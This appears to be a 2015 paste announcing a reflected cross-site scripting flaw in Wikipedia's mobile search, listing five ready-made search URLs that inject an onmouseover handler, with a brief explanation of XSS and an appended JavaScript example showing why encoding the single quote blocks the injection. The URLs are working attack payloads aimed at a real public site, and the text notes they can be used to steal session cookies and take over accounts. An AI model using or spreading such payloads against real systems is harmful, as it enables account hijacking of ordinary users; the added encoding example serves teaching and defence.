Kyfx

Wikipedia Vulnerability

Jun 24th, 2015
Wikipedia, the world's largest 'biased' information portal, is vulnerable to an XSS (Cross-Site Scripting) attack. The following are the links through which the attack can be commenced.

http://en.wikipedia.org/w/index.php?search=%27%20onmouseover%3dprompt%28952154%29%20bad%3d%27&title=Special:Search&useformat=mobile

http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=0&search=%27%20onmouseover%3dprompt%28955575%29%20bad%3d%27&title=Special:Search&useformat=mobile

http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=1&search=%27%20onmouseover%3dprompt%28941380%29%20bad%3d%27&title=Special:Search&useformat=mobile

http://en.wikipedia.org/w/index.php?fulltext=Search&redirs=0&search=%27%20onmouseover%3dprompt%28983464%29%20bad%3d%27&title=Special:Search&useformat=mobile

http://en.wikipedia.org/w/index.php?advanced=1&fulltext=Search&ns0=1&ns1=1&ns10=1&ns100=1&ns101=1&ns108=1&ns109=1&ns11=1&ns12=1&ns13=1&ns14=1&ns15=1&ns2=1&ns3=1&ns4=1&ns5=1&ns6=1&ns7=1&ns8=1&ns9=1&redirs=1&search=%27%20onmouseover%3dprompt%28980283%29%20bad%3d%27&title=Special:Search&useformat=mobile

Wikipedia's list of external hosts:

What is XSS (Cross-Site Scripting)? Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable link to fool a user in order to gather data from them. A hacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
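
Why a value shaped like the `search` parameter in the links above survives partial output encoding, as an added example that is not part of the original paste: the decoded value contains no `<`, `>` or `"`, so an encoder that skips the single quote leaves it intact. The single-quoted `<input>` template and the small attribute lister are assumptions made for illustration, not MediaWiki code.

```javascript
// Added example. QUERY is the query string of the first link in the paste.
const QUERY = "search=%27%20onmouseover%3dprompt%28952154%29%20bad%3d%27" +
  "&title=Special:Search&useformat=mobile";

// Weak encoder: covers & < > and the double quote, but not the single quote.
function escapeWeak(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
    .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Attribute-safe encoder: the same, plus the single quote.
function escapeAttr(s) {
  return escapeWeak(s).replace(/'/g, "&#39;");
}

// Hypothetical template (assumption): the term is echoed into a
// single-quoted attribute value.
function renderSearchBox(term, escape) {
  return "<input type='search' name='search' value='" + escape(term) + "'>";
}

// Lists the attribute names a tag ends up with. Simplified stand-in for an
// HTML parser: handles quoted and unquoted values, which is all this needs.
function attributeNames(tag) {
  const re = /([a-zA-Z-]+)\s*=\s*(?:'[^']*'|"[^"]*"|[^\s'">]+)/g;
  const names = [];
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

function demo() {
  const term = new URLSearchParams(QUERY).get("search");
  return {
    term,
    weak: attributeNames(renderSearchBox(term, escapeWeak)),
    safe: attributeNames(renderSearchBox(term, escapeAttr)),
  };
}

console.log(demo());
```

With the weak encoder the tag gains extra attributes, including an event handler; with the single quote encoded, the whole term stays inside `value`.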